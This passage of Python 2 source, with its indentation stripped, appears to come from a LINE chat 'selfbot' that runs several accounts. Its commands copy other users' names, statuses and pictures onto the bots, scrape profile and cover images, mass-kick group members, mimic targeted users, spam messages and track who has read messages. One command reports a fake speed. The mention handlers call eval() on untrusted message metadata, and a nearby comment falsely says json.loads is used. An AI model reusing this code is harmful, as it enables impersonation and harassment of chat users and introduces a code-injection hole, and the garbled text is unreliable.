elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#-------------------------------------------------------
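# "Gift @<name>" sends a LINE theme gift into the chat: the message is turned
# into a gift message by setting contentType 9 and pointing the PRDID
# metadata at a fixed theme product id, with MSGTPL selecting a message
# template.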
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg)
#===========================================
elif msg.text.lower() == 'responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + " "
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + " "
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + " "
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + " "
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + " "
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + ""
kt.sendText(msg.to, text)
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
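# The profile-scraping commands below build avatar URLs from the LINE CDN
# prefix plus the contact's pictureStatus token, falling back to a stock
# "not found" image when no avatar is set; cover photos are fetched through
# the channel API instead.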
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,str(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,str(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy1 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy1 @","")
_nametarget = _name.rstrip(' ')
gs = kk.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kk.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kk.CloneContactProfile(target)
kk.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy2 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy2 @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy3 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy3 @","")
_nametarget = _name.rstrip(' ')
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kc.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kc.CloneContactProfile(target)
kc.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy4 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy4 @","")
_nametarget = _name.rstrip(' ')
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ks.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ks.CloneContactProfile(target)
ks.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy5 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy5 @","")
_nametarget = _name.rstrip(' ')
gs = kt.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kt.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kt.CloneContactProfile(target)
kt.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
kt.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali ke asli"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
kt.updateDisplayPicture(backup.pictureStatus)
kt.updateProfile(backup)
cl.sendText(msg.to, "Backup Astro Sukses")
except Exception as e:
cl.sendText(msg.to, str (e))
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Blacklist all" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Blacklist all","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Semua Telah Di Hapus")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Maaf")
else:
for target in targets:
if not target in Bots:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sentText(msg.to,"Berhasil Dihapus")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda m: m == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,str(error))
#-------------------------------------------------------
#--------------------------------------------------------
elif "Ban group: " in msg.text:
grp = msg.text.replace("Ban group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in admin:
for i in gid:
h = cl.getGroup(i).name
if h == grp:
wait["BlGroup"][i]=True
cl.sendText(msg.to, "Success Ban Group : "+grp)
else:
pass
else:
cl.sendText(msg.to, "Khusus admin")
#--------------------------------------------------------
elif msg.text in ["List ban","List ban group"]:
if msg.from_ in admin:
if wait["BlGroup"] == {}:
ki.sendText(msg.to,"nothing")
kk.sendText(msg.to,"nothing")
kc.sendText(msg.to,"nothing")
else:
mc = ""
for gid in wait["BlGroup"]:
mc += "-> " +cl.getGroup(gid).name + "\n"
ki.sendText(msg.to,"===[Ban Group]===\n"+mc)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif msg.text in ["Del ban: "]:
if msg.from_ in admin:
ng = msg.text.replace("Del ban: ","")
for gid in wait["BlGroup"]:
if cl.getGroup(gid).name == ng:
del wait["BlGroup"][gid]
cl.sendText(msg.to, "Success del ban "+ng)
else:
pass
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Join group: " in msg.text:
ng = msg.text.replace("Join group: ","")
gid = cl.getGroupIdsJoined()
try:
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.inviteIntoGroup(i,[Creator])
cl.sendText(msg.to,"Success join to ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
except Exception as e:
cl.sendMessage(msg.to, str(e))
#--------------------------------------------------------
elif "Leave group: " in msg.text:
ng = msg.text.replace("Leave group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
elif "Set member: " in msg.text:
if msg.from_ in admin:
jml = msg.text.replace("Set member: ","")
wait["Members"] = int(jml)
cl.sendText(msg.to, "Jumlah minimal member telah di set : "+jml)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Add all" in msg.text:
if msg.from_ in admin:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
elif "Ulti " in msg.text:
if msg.from_ in admin:
ulti0 = msg.text.replace("Ulti ","")
ulti1 = ulti0.rstrip()
ulti2 = ulti1.replace("@","")
ulti3 = ulti2.rstrip()
_name = ulti3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
nl.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
nl.kickoutFromGroup(msg.to,[target])
nl.leaveGroup(msg.to)
print (msg.to,[target])
except:
nl.sendText(msg.to,"Eliminated....")
nl.sendText(msg.to,"Take it easy bro....!!!")
nl.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading.....")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
kt.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
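# The "BotN clone" commands below resolve @mentions from
# msg.contentMetadata["MENTION"], a JSON string shaped roughly like
# {"MENTIONEES": [{"S": "0", "E": "4", "M": "u1234..."}]} (a sketch of the
# expected payload), where "M" is the mid of the mentioned user. json.loads
# parses it here; eval on untrusted metadata would be unsafe.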
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurking result":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#--------------- WIPE THE GROUP WITHOUT KICKING FELLOW BOTS/ADMINS ----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#------------------- Spam functions start --------------------------
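# "Spam change:" / "Spam add:" store the text in wait["spam"];
# "Spam:<count>" then sends that stored text <count> times to the chat.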
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
